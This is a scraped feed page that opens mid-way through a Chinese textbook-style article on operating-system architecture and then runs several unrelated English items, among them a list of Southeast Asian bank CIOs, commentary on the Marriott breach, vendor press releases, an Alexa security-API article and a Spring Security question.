5)融入了面向对象技术在设计微内核 OS 时,采用了面向对象的技术,其中的"封装"、"继承"、"对象类"和"多态性",以及在对象之间采用消息传递机制等,都十分有利于提高系统的的"正确性"、"可靠性"、"易修改性"、"易扩展性"等,而且还能显著地减少开发系统所付出的开销。

微内核系统存在的问题:在微内核 OS 中,由于客户和服务器及服务器和服务器之间的通信,都需通过微内核,只是同样的服务请求至少需要四次上下文切换。第一次是发生在客户发送请求消息给内核,以请求取得某服务器特定的服务时;第二次是发生在由内核把客户的请求消息发往服务器时,第三次是当服务器完成客户的请求后,把响应消息发送到内核时;第四次是在内核将响应消息发送给客户时。实际情况是,当某个服务器自身尚无能力完成客户请求,而需要其他服务器帮助时,如下图所示,其中的文件服务器还需要磁盘服务器的帮助,这时就需要进行上下文的切换。


成为“黑客”前,必须学习的“操作系统架构体系”

为了改善运行效率,可以重新把一些常用的操作系统的基本功能,由服务器移入微内核中,这样可使客户对常用操作系统的功能的请求所发生的用户/内核模式和上下文切换的次数。但是这又会使微内核的容量明显的增大,在小型接口定义和适应性方面的有点也有所下降,同时也提高了微内核的设计代价

四、 操作系统的功能 主要功能:

1、隐藏了硬件调用接口,为应用程序员提供调用硬件资源的更好,更简单,更清晰的模型(系统调用接口)。应用程序员有了这些接口后,就不用再考虑操作硬件的细节,专心开发自己的应用程序即可。

例如:操作系统提供了文件这个抽象概念,对文件的操作就是对磁盘的操作,有了文件我们无需再去考虑关于磁盘的读写控制(比如控制磁盘转动,移动磁头读写数据等细节),

2、将应用程序对硬件资源的竞态请求变得有序化

例如:很多应用软件其实是共享一套计算机硬件,比方说有可能有三个应用程序同时需要申请打印机来输出内容,那么a程序竞争到了打印机资源就打印,然后可能是b竞争到打印机资源,也可能是c,这就导致了无序,打印机可能打印一段a的内容然后又去打印c,操作系统的一个功能就是将这种无序变得有序。

详细功能: (1) 处理机管理功能

处理机管理的主要功能是创建和撤销进程,对诸进程的运行进行协调,实现进程之间的信息交换,以及按照一定的算法把处理及分配给进程。

1、进程控制

进程控制的主要功能是为作业创建进程,撤销已结束的进程,以及控制进程在运行过程中的状态转换。

2、进程同步

进程同步的主要任务是为多个进程的运行进行协调。有两种协调方式:

1)进程互斥方式:这是指诸进程在对临界资源进行访问时,应采用互斥方式;

2)进程同步方式:这是指在相互合作去完成功能任务的诸进程间,由同步机构对他们的执行次序加以协调。

3、进程通信

在多道程序环境下,为了加速应用程序的运行,应在系统中建立多个进程,并且再为一个进程建立若干个线程,由这些进程(线程)相互合作去完成一个共同的任务。

4、调度

1)作业调度

作业调度的基本任务是从后备队列中按照一定的算法,选择出若干个作业,为他们分配运行所需的资源。在将他们调入内存后,便分别为他们建立进程,使他们都成为可能获得处理机的就绪进程,并按照一定的算法将他们插入就绪队列。

2)进程调度

进程调度的任务是从进程的就绪队列中,按照一定的算法选出一个进程,把处理机分配给它,并为它设置运行现场,使进程投入执行。值得提出的是,在多线程OS中,通常是把线程作为独立运行和分配处理机的基本单位,为此,须把就绪线程排成一个队列,每次调度时,是从就绪线程队列中选出一个线程,把处理机分配给它。

(2) 存储器管理功能

存储器的主要任务是为多道程序的运行提供良好的环境,方便用户使用存储器,提高存储器的利用率以及能从逻辑上扩充内存。

1、内存分配

内存分配的主要任务是为每道程序分配内存空间,使它们"各得其所";提高存储器的利用率,以减少不可用的内存空间;允许正在运行的程序申请附加的内存空间,以适应程序和数据动态增长的需要。

为了实现内存分配,在内存分配的机制中应具有这样的结构功能:

1)内存分配数据结构。该结构用于记录内存空间的使用情况,作为内存分配的依据。

2)内存分配功能。系统按照一定的内存分配算法为用户程序分配内存空间。

3)内存回收功能。系统对用用户不再需要的内存,通过用户的释放请求去完成系统的回收功能。

2、内存保护

内存保护的主要任务是确保每道用户程序都只在自己的内存空间内运行,彼此互不干扰;决不允许用户程序访问操作系统的程序和数据;也决不允许用户程序转移到非共享的其他用户程序中去执行。

3、地址映射

4、内存扩充

为了能在逻辑上扩充内存,系统必须具有内存扩充机制,用于实现下述各功能:

1)请求调入功能。

允许在装入一部分用户程序和数据的情况下,便能启动该程序运行。在程序运行过程中,若发现要继续运行时所需的程序和数据尚未装入内存,可向OS发出请求,由OS从磁盘中将所需部分调入内存,以便继续运行。

2)置换功能。

若发现在内存中已无足够的空间来装入需要调入的程序和数据时,系统应能将内存中的一部分暂时不用的程序和数据调至盘上,以腾出内存空间,然后再将所需调入的部分装入内存。

(3) 设备管理功能

完成用户进程提出的 I/O 请求;为用户进程分配所需的 I/O 设备;提高 I/O 设备和 CPU 的利用率;提高 I/O 速度;方便用户使用 I/O 设备。

设备管理应具有:缓冲管理,设备分配,设备处理以及虚拟设备等功能。

1、缓冲管理:

2、设备分配:

设备分配的基本任务是根据用户进程的 I/O 请求、系统的现有资源情况以及按某种设备的分配策略,为之分配其所需的设备。

3、设备处理:

设备处理的基本任务是用于实现 CPU 和设备控制之间的通信。

4、虚拟设备:

(4) 文件管理功能

文件管理的主要任务是对用户文件和系统文件进行管理,以方便用户使用,并保证文件的安全性。

为此,文件管理应具有对文件存储空间的管理、目录管理、文件的读/写管理,以及文件的共享与保护等功能。

1、文件存储空间的管理

为每个文件分配必要的外存空间,提高外存利用率,并能有助于提高文件系统的存、取速度。

2、目录管理

为每个文件建立其目录项,并对众多的目录项加以有效的组织,以实现方便的按名存取,即用户只需提供文件名便可对该文件进行存取。

3、文件的读/写管理和保护

1)文件的读、写管理

根据用户的请求,从外存中读取数据,或将数据写入外存。

2)文件保护

①防止未经核准的用户存取文件

②防止冒名顶替存取文件

③防止以不正确的方式使用文件

(5) 操作系统与用户之间的接口

用户与操作系统的接口:

1、用户接口

它是提供给用户使用的接口,用户可通过该接口取得操作系统的服务。

1)联机用户接口

为联机用户提供,它由一组键盘操作命令及命令解释程序所组成。

2)脱机用户接口

为批处理作业的用户提供的,故也称批处理用户接口。该接口由一组作业控制语言(JCL)组成。批处理作业的用户不能直接与自己的作业交互作用,只能委托系统代替用户对作业进行干预和控制。这里的作业控制语言 JCL 便是把需要对作业进行的控制和干预事先写在作业说明书上,然后将作业和作业说明书一起提供给系统。

3)图形用户接口

图形用户接口采用了图形化的操作界面,用非常容易识别的各种图标将系统的各项功能、各种应用程序和文件,直观、逼真的表示出来。

2、程序接口

是为用户程序在执行中访问系统资源而设置的,是用户程序取得操作系统服务的唯一途径。

5、 主流操作系统架构图 1)、windows操作系统架构图
成为“黑客”前,必须学习的“操作系统架构体系”
2、linux操作系统架构图

系统一般有4个主要部分:

内核、shell、文件系统和应用程序。内核、shell和文件系统一起形成了基本的结构,它们使得用户可以运行程序、管理文件并使用系统。


成为“黑客”前,必须学习的“操作系统架构体系”
3、Android系统架构图
成为“黑客”前,必须学习的“操作系统架构体系”
4、Mac系统架构图
成为“黑客”前,必须学习的“操作系统架构体系”

Top financial services CIOs in Southeast Asia

$
0
0

The role of the Chief Information Officer is continuing to gain relevance across Southeast Asia.

Last month, Indonesia's president, Joko Widodo, issued a decree instructing all government agencies in the country to appoint a CIO to coordinate technological agendas between different authorities.

Here we have a list of top CIOs and IT executives in the financial services industry across the ASEAN region.

Surachai Chatchalermpun, CISO, Krung Thai Bank, Thailand

Chatchalermpun is the Chief Information Security Officer (CISO) of Krung Thai Bank (KTB), a state-owned bank in Thailand which was formed in 1966 following the merger of two government-owned banks, Kaset Bank and Monton Bank.

He leads an IT security team responsible for app penetration testing, IT security compliance, security solution architecture, security awareness and user activity monitoring (UAM). Prior to joining KTB, Chatchalermpun was the Regional IT Security Manager and Head of IT Security at Maybank Kim Eng Securities (Thailand) responsible for the entire spectrum of the company’s IT Security.

Mary James, CIO, Bank Danamon, Indonesia

James has over 20 years of experience in IT within the banking and telecommunications sectors, with a focus on turnkey projects, product development and implementation of mission critical application systems and processes.

She has also expertise in conceptualising business models and delivering cost efficient, quality solutions to enterprises. James has written about the importance of the finance sector adapting to digital disruption.

Her previous roles include Group CIO and Head of Infrastructure at Alliance Bank, Malaysia and CIO at NIB, Pakistan.

Voranuch Dejakaisaya, CIOO, Bank of Ayudhya (Krungsri), Thailand

After 10 years of service in the Krungsri bank as CIO leading the Information Technology Group, Dejakaisaya was appointed to be Chief Information and Operations Officer (CIOO) in January 2017, extending her responsibilities to the operational arm of the group.

Krungsri is one of Thailand’s most important banks and has strategic shareholders from Mitsubishi UFJ Financial Group (MUFG), Japan largest bank and the fifth worldwide by total assets.

During her 30 years of experience in IT and financial services, Krungsri has witnessed numerous changes in the industry. She said in an interview with FST Media , that these “range from product innovation, growth, productivity, security and regulatory control requirements, and our challenge is to develop IT solutions to cover the end-to-end process.”

Eat Chetrasorivong, acting CIO, Sathapana Bank, Cambodia

With nearly 15 years of experience in IT with a strong focus on the banking sector, Chetrasorivong has worked with five international banks, including Maybank, Phillip Bank and Angkor Capital Bank.

At Sathapana Bank he leads and directs four IT departments (IT Application, IT Infrastructure, IT Digital System and Information Security) and is in charge of project management, resources and HR. Chetrasorivong is also responsible for key support to enable business units to achieve targeted objectives.

Tran Cong Quynh Lan, Deputy General Director, Chief Information Officer, VietinBank, Vietnam

Tran Cong Quynh Lan joined VietinBank in 2012 and is currently Deputy General Director, CIO, at VietinBank.

He is in charge of all IT related activities in the bank, including the development and monitoring of the implementation of the organisation’s IT strategy to ensure that is coordinates with the business strategy.

Among the CIO’s achievements are the standardisation of the IT architecture towards service and the deployment of multi-functional customer platforms such as mobile and internet banking.

In 2015 he received an award at IDG’s CIO and CSO Summit & Awards in Southeast Asia.

Enrico Hernandez, Senior VP - Information Technology at BDO Unibank, Philippines

Enrico Hernandez has been Senior Vice President, Head - Information Technology Group - Information Technology Development of Philippines’ BDO Unibank since May 2011.

He has previously handled the ITD Unit responsible for consumer lending and served as the IT Head of BDO Private Bank Inc. He was also Applications Development Head of Banco Santander Philippines, which BDO acquired in 2003.

Hernandez is a graduate from Ateneo de Manila University and holds BSc degrees in Chemistry and Computer Engineering.

David Gledhill, Group CIO, DBS Bank, Singapore

David Gledhill is Group Chief Information Officer, as well as Head of Group Technology & Operations at DBS Bank, one of Asia’s leading banks and a leading Asian bank and dubbed by Euromoney as the “World’s Best Digital Bank”.

Gledhill has over 25 years of experience in the financial service industry and has spent over 20 years in Asia. Prior to joining DBS in 2008, he worked for 20 years at JP Morgan, holding senior regional positions in technology and operations.

As Head of Group Technology & Operations at DBS, Gledhill manages about 10,000 professionals across the region and is focused on strengthening the bank’s technology and infrastructure platform to drive greater resilience, organisational flexibility and innovation.

Marriott Breach Points To Issue In Security Reporting In M&A Deals

$
0
0

On Friday, November 30th, Marriott International announced what could be one of the largest data breaches in history . Over 500 million guests’ personal data, ranging from names to passport numbers to birth dates, had been compromised over four years. Specifically, the cybercriminals accessed the Starwood reservation database Starwood hotels merged with Marriott in 2016.

While a breach of this size is unique, the situation is all too familiar. We saw in March that UnderArmour acquiree MyFitnessPal had over 150M users’ data compromised , causing UnderArmour’s stock to plummet. FedEx subsidiary TNT Express also was the victim of an attack , but FedEx was the one to feel the financial impact.

While it may not be the strategy of the cybercriminals to infiltrate potential acquisition targets, the trojan horse impact for these large acquiring enterprises can ripple for years after the acquisition.

The need for transparent cybersecurity reporting

During an M&A deal, the primary focus of the acquirer is the financial solvency of the organization. To investors, cash flow is still the currency in a deal. We live in a world, though, where information and data are just as important as cash flow. Specifically, the security protecting that data needs to be just as critical to an M&A conversation as the financial status of the acquiree.

For many organizations that still use spreadsheets, articulating the status of the security program in an effective and time-efficient manner to non-technical investors and stakeholders is nigh impossible.

CISO’s will become a critical player in M&A deals

As information security is seen as a critical business function, breaches like Marriott will become cautionary tales for M&A teams. CISO’s will need platforms and solutions that deliver comprehensive reports to summarize their program during an M&A event.

Both the buyer and seller will also need a single-pane-of-glass integrated risk solution that helps combine the two programs after the M&A event.

CISO’s need the tools to report

As we see with too many large organizations, it is too easy to overlook a cybersecurity program when it lives on spreadsheets. The fragmentation that a check-box compliance program has will continue to leave breaches like this undetected. As we’ve seen, the need for an integrated risk management solution is clear from an operational standpoint. What we will start seeing now is an integrated solution being mandated by the board and M&A committees.

On Friday, November 30th, Marriott International announced what could be one of the largest data breaches in history . Over 500 million guests’ personal data, ranging from names to passport numbers to birth dates, had been compromised over four years. Specifically, the cybercriminals accessed the Starwood reservation database Starwood hotels merged with Marriott in 2016.

While a breach of this size is unique, the situation is all too familiar. We saw in March that UnderArmour acquiree MyFitnessPal had over 150M users’ data compromised , causing UnderArmour’s stock to plummet. FedEx subsidiary TNT Express also was the victim of an attack , but FedEx was the one to feel the financial impact.

While it may not be the strategy of the cybercriminals to infiltrate potential acquisition targets, the trojan horse impact for these large acquiring enterprises can ripple for years after the acquisition.

The need for transparent cybersecurity reporting

During an M&A deal, the primary focus of the acquirer is the financial solvency of the organization. To investors, cash flow is still the currency in a deal. We live in a world, though, where information and data are just as important as cash flow. Specifically, the security protecting that data needs to be just as critical to an M&A conversation as the financial status of the acquiree.

For many organizations that still use spreadsheets, articulating the status of the security program in an effective and time-efficient manner to non-technical investors and stakeholders is nigh impossible.

CISO’s will become a critical player in M&A deals

As information security is seen as a critical business function, breaches like Marriott will become cautionary tales for M&A teams. CISO’s will need platforms and solutions that deliver comprehensive reports to summarize their program during an M&A event.

Both the buyer and seller will also need a single-pane-of-glass integrated risk solution that helps combine the two programs after the M&A event.

CISO’s need the tools to report

As we see with too many large organizations, it is too easy to overlook a cybersecurity program when it lives on spreadsheets. The fragmentation that a check-box compliance program has will continue to leave breaches like this undetected. As we’ve seen, the need for an integrated risk management solution is clear from an operational standpoint. What we will start seeing now is an integrated solution being mandated by the board and M&A committees.


Scale Global Deployments Exponentially with XebiaLabs Satellite

$
0
0

Scale Global Deployments Exponentially with XebiaLabs Satellite

The XebiaLabs DevOps Platform’s Satellite feature packs a one-two punch. It helps organizations scale complex, long-running application deployments exponentially―without negatively affecting performance―by offloading deployment work from the XL Deploy server to satellite servers. And for organizations that have data centers located around the world, Satellite provides fault tolerance and continuity in the face of network failures.

The icing on the cake is that Satellite does it all―on-premises or in the public, private, or hybrid cloud―without requiring you to install proprietary agent software on every deployment target. That means faster setup, less maintenance work, no audit concerns, and more security for your infrastructure.

The XebiaLabs DevOps Platform 8.5 introduces even easier satellite management for users across the enterprise

The XebiaLabs DevOps Platform 8.5 introduces a friendly graphical user interface that allows both technical users and business stakeholders to monitor and manage the satellites in their system. This new user interface:

Features at-a-glance overviews of satellite health for easier monitoring and troubleshooting Makes it easy to organize satellites into groups for enhanced failover and load balancing capabilities Enables one-click maintenance actions such as restarting satellites and synchronizing plugins Provides comprehensive overviews of which deployments are running on which satellites Includes easy drill-down from high-level satellite overviews to low-level deployment tasks
Scale Global Deployments Exponentially with XebiaLabs Satellite

Developers, Operations staff, and System Administrators can use the new interface to monitor the health of their satellites, to verify that network connections to satellites are working as expected, and to restart and synchronize satellites and when required.

QA Testers, Release Managers, and Product Owners can also use the interface to check the status of their application deployments, to verify where their deployments are running, and to collect information needed to troubleshoot slow or failed deployments.


Scale Global Deployments Exponentially with XebiaLabs Satellite
Benefits of XebiaLabs Satellite

XebiaLabs offers the first and only hassle-free, resilient, fault-tolerant global application deployment solution, designed to make enterprise deployments go smoothly. If your network has bandwidth, latency, or reliability issues, there’s no better way to ensure fast and error-free deployments.

XebiaLabs Satellite provides:

Infinite scalability for deployment workloads without the overhead of agents Increased fault tolerance and reliability when network connections are unstable Reduced network traffic that substantially reduces costs for global infrastructure Automated staging and clean-up of deployment artifacts Full control over deployment security in remote data centers Simpler deployments across mixed Unix/windows environments

Cybersecurity as a Selling Point: Retailers Take Note

$
0
0

UK-based retailers were no strangers to data breaches in 2018. In June, Dixons Carphone announced a breach of 5.9 million customer bank card details and 1.2 million personal data records, and the following month, Fortnum & Mason likewise warned customers that their data had been exposed. In fact, since GDPR took effect in May, more than 8,000 data breach reports have been filed in the UK. Each of these breaches involved a notification to the affected users which, combined with accompanying news coverage, is creating a cultural shift in cybersecurity awareness and redefining people’s online shopping habits.


Cybersecurity as a Selling Point: Retailers Take Note

The fact is, very few businesses have the luxury of occupying a unique position in the market without direct competition, and security can―and does―play a role in influencing consumer brand loyalty. Case in point: Following its 2015 hack, TalkTalk lost 100,000 customers.

Considering these dynamics, it is vital that consumer-facing companies view security and privacy not just as the thing that saves them from harm, but as a competitive advantage to be leveraged to drive trade at the loss of those that do not.

Security Standards Are Shifting

Currently, it is a mixed picture as to which organisations advertise their security acumen to their competitive advantage. Of the top five retailers in the UK, three have primary navigation links―named “Privacy Centre” or something similar―on their homepages directing users to their security standards. If I had to guess, I’d say all five top retailers will have a primary link to such a resource by the end of next year.

[You may also like: Consumer Sentiments About Cybersecurity and What It Means for Your Organization]

Online banking institutions appear to be the most acutely aware of security’s influence on customer decision making.This is a perhaps unsurprising, given that their security postures are scored by third party organisations such as Which? , across categories such as two-factor authentication login, encryption, safe navigation and logout.

Since the advent ofGDPR―which sets out clear guidelines for companies with regard to how they should store data in their systems, how they should identify and report breaches, and more―we are seeing security positioned as a primary consideration in the build of new online services, so-called ‘data protection by design.’ We could not have conceived of this a new phenomenon prior to GDPR, and it will surely result in a fundamentally different online experience for consumers in the coming years.

The Role of AI in Managing Privacy

Security regulations aren’t the only new influence on managing consumer privacy. New technologies, like AI and IoT devices, are likewise impacting online retail experiences. While the top ten UK retailers don’t currently utilize chatbots or similar AI technology on their websites, chatbots are increasing in popularity among organisations that have complex or diverse product ranges (like H&M’s Virtual Assistant for clothing selection guidance).

[You may also like: Consolidation in Consumer Products: Could it Solve the IoT Security Issues?]

As cutting-edge and “cool” as these are, the reality is that any form of online communications can become a vector for cybersecurity attacks. And the newer a technology is, the more likely it will become a focal point for hackers, since gaps tend to exist in technologies that have yet to establish a solid framework of controls. Just askDelta Airlines and Sears, which suffered targeted attacks on their third-party chat support provider, exposing customer data and payment information.

One of the primary privacy exposures facing these types of online services is the frequency of change in web applications.Decisions on how and when to secure an application can be lost during interactions between developers and security professionals, particularly when code changes can be upwards of thousands per day.How do you reduce this risk? One way is via the application of machine learning to understand and patrol the “good” behavior of web application use, as opposed to chasing the ever-lengthening tail of “bad” behaviors and deploying access control lists.

The Way Forward

By pushing privacy to the forefront of customer experiences, online retailers can differentiate themselves from competitors. A recentRadware survey discovered just how security conscious UK consumers are: They are liable to abandon brand loyalty in exchange for a secure online shopping experience. Organisations would do well to invest in strong cybersecurity if they want to increase trust and attract new customers at key trading periods. Otherwise, retailers stand to lose their competitive advantage by encouraging customers to exercise their true power, their power to go elsewhere.


Cybersecurity as a Selling Point: Retailers Take Note

Read “Consumer Sentiments: Cybersecurity, Personal Data and The Impact on Customer Loyalty” to learn more.

Download Now

RiskSense Platform Addresses Security and IT Operations Gaps

$
0
0
Deep Integration with ServiceNow Service Desk Incident and Service
Catalogs Automates Information Sharing and Collaboration for Faster
Remediation of Vulnerabilities

SUNNYVALE, Calif. (BUSINESS WIRE) lt;a href=”https://twitter.com/hashtag/AppSec?src=hash” target=”_blank”gt;#AppSeclt;/agt; RiskSense , Inc.,

pioneering risk-based vulnerability prioritization and management, today

announced a new version of the RiskSense platform that closes the gap

between security and IT that often prevents vulnerabilities from being

remediated in a timely fashion. New collaboration options include

automated vulnerability updates and findings, support for sophisticated

workflows, and ease of communicating and validating IT remediation

priorities for fighting cyber risk.


RiskSense Platform Addresses Security and IT Operations Gaps

According to Gartner, Inc., “Successful realization of standard SOC

capabilities is just not possible without certain inputs from the IT

organization. A collaborative relationship between the SOC and IT teams

such as help desk and network operations center (NOC) is instrumental,

but it’s not enough. Depending on the scope of the SOC project, IT will

need to either establish new or provide access to existing processes…”*

Enhanced Vulnerability Management Visibility and Collaboration

To

help SOC and NOC users prioritize activities based on remediation

projects, regulatory compliance, or other business-specific security use

cases, RiskSense has introduced the following two key enhancements that

simplify the tracking and remediation of security vulnerabilities.

To manage threats from a 360 degree perspective, RiskSense enables users

to tag vulnerabilities explicitly with distinct views filtered by

affected hosts, applications or databases. Users can create tags to

facilitate remediation efforts using one or more of the following tag

types: location, remediation, people, compliance, scanner, CMDB or the

new “project” tag type.

The new project tag allows users to set a determined start and end date

for projects and track it through its lifecycle from the tag view. For

example, if a user wants to track remediation progress by location, they

can choose the location type tag to create a project. These customizable

views allow project owners to more efficiently track both the status and

progress of remediation efforts to meet regulatory compliance

requirements for PCI, HIPAA, and more.

For tighter collaboration between SOC and NOC teams, RiskSense now

offers enhanced bi-directional integration with two ServiceNow

modules:

Incident

and

Service

. With these new integrations, the sharing and updating of

incident or service ticket information is synchronized between the two

systems. This enables organizations that use ServiceNow to manage their

IT infrastructure to provide network, application and database support

teams with up-to-the-minute vulnerability remediation activity details

and status from the RiskSense platform or the ServiceNow interface.

Conversely, SOC teams can monitor and maintain visibility into

remediation actions and progress by their NOC counterparts in the

RiskSense platform.

“Risk and vulnerability management is a collaborative effort between

security operations and network operations teams that requires real-time

information sharing to remediate high-priority threats before they can

be exploited,” said Srinivas Mukkamala, CEO of RiskSense. “We continue

to enhance the RiskSense platform and its workflow capabilities to make

it easier, faster and more automated for organizations to detect and fix

security risks, even if their attack surface is growing faster than the

resources they have to manage it.”

In addition to the ServiceNow functionality, this latest release of the

RiskSense platform also features a new integration with Tanium Comply,

as well as support for Retina’s new Extended Report format.

*Gartner, Inc., How to Plan, Design, Operate and Evolve a SOC , 06

September 2018, by Anton Chuvakin, Augusto Barros, and Anna Belak.

Availability

The new version of the RiskSense platform is

available now.

About RiskSense

RiskSense , Inc. provides

vulnerability prioritization and management to measure and control

cybersecurity risk. The cloud-based RiskSense platform uses a foundation

of risk-based scoring, analytics, and technology-accelerated pen testing

to identify critical security weaknesses with corresponding remediation

action plans, dramatically improving security and IT team efficiency and

effectiveness. For more information, visit www.risksense.com

or follow us on Twitter at @RiskSense.

Contacts

RiskSense

Marc Gendron

+1 781.237.0341

marc@mgpr.net

media.relations@risksense.com


RiskSense Platform Addresses Security and IT Operations Gaps
Do you think you can beat this Sweet post? If so, you may have what it takes to become a Sweetcode contributor...Learn More.

Alexa’s Security Panel Controller API lets users control their home security sy ...

$
0
0

Alexa’s now the master of your home security system ― but only if you want it to be, of course. Amazon today announced a new API for its handy voice assistant ― aptlynamed the Security Panel Controller API ― which allows customers to control connected alarms, cameras, and more with voice commands.

The capabilities were first detailed at an Amazon event in September , and they’re broadly available in the U.S. starting today and work with products from providers like ADT, Ring, Honeywell, Abode, and Scout Alarm.

Systems that implement the Security Panel Controller API let you arm, disarm, and query status with Alexa-enabled devices,Brian Crum, senior product manager at Amazon, explained in a blog post . Arming a system’s as easy as saying “Alexa, arm [device name] in [mode type] mode” or “Alexa, arm.” (If you don’t specify a mode, it’ll default to “stay” or “home” mode.) To disarm it, say “Alexa, disarm [device name]” or “Alexa, disarm.”

To get the disarm command up and running, you’ll first have to enable disarm-by-voice. To do so, launch the Alexa app on your smartphone (iOS or Android) or PC, navigate to the settings page, and choose between one of two options: providing your security system’s four-digit PIN code orcreating an Alexa-specific voice code. Once you’ve completed that step, you’re golden.

Security Panel Controller API builds on Amazon’sAlexa Guard, a forthcoming alert feature which sends notifications to your phone when an Amazon Echo speakerdetects the sound of breaking glass or a smoke or carbon monoxide alarm. Alexa Guard can also randomize the lights in your home when you’re away to make it appear as though you’re there, and integrate withRing and ADT so that alerts are sent to a security company.

Its debut also follows on the heels of a bevy of new Alexa features , including the ability to set location-based routines and reminders, discover and call local businesses and restaurants via voice requests, sift through multiple email inboxes for important messages, and more. Just last week, Amazon’s Alexa team launched a self-learning system that “detects the defects in Alexa’s understanding and automatically recovers from these errors” without the need for human intervention, and a dialogue-driven music playlist feature that allowsusers to find new playlists through voice.

Also last week, Amazon debutedAlexa Answers, a feature that lets customers tackle uncommon questions by submitting answers that may be distributed to millions of Alexa users around the world.

Obtain permission for the user name in the header for spring security

$
0
0

I need to implement spring security for my api-controller.

-> Each page should contain a header with username (like in Siteminder?).

-> Every user has been already registered in SpringConfiguration

@Autowired public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception { ... gets all users from database with their authorities }

-> For every page it's configured, which authorities a user should have

@Override protected void configure(HttpSecurity http) throws Exception { http.authorizeRequests() .antMatchers("**/Pagename/**").hasAuthority("authorityName"); }

I cannot understand now, what should I add to make the program read a username from page header. RequestHeaderAuthenticationFilter? Another kind of filter?

The other question is if you could give me a link to tutorial/examle how to build it in without using XML.

Viewing all 12749 articles
Browse latest View live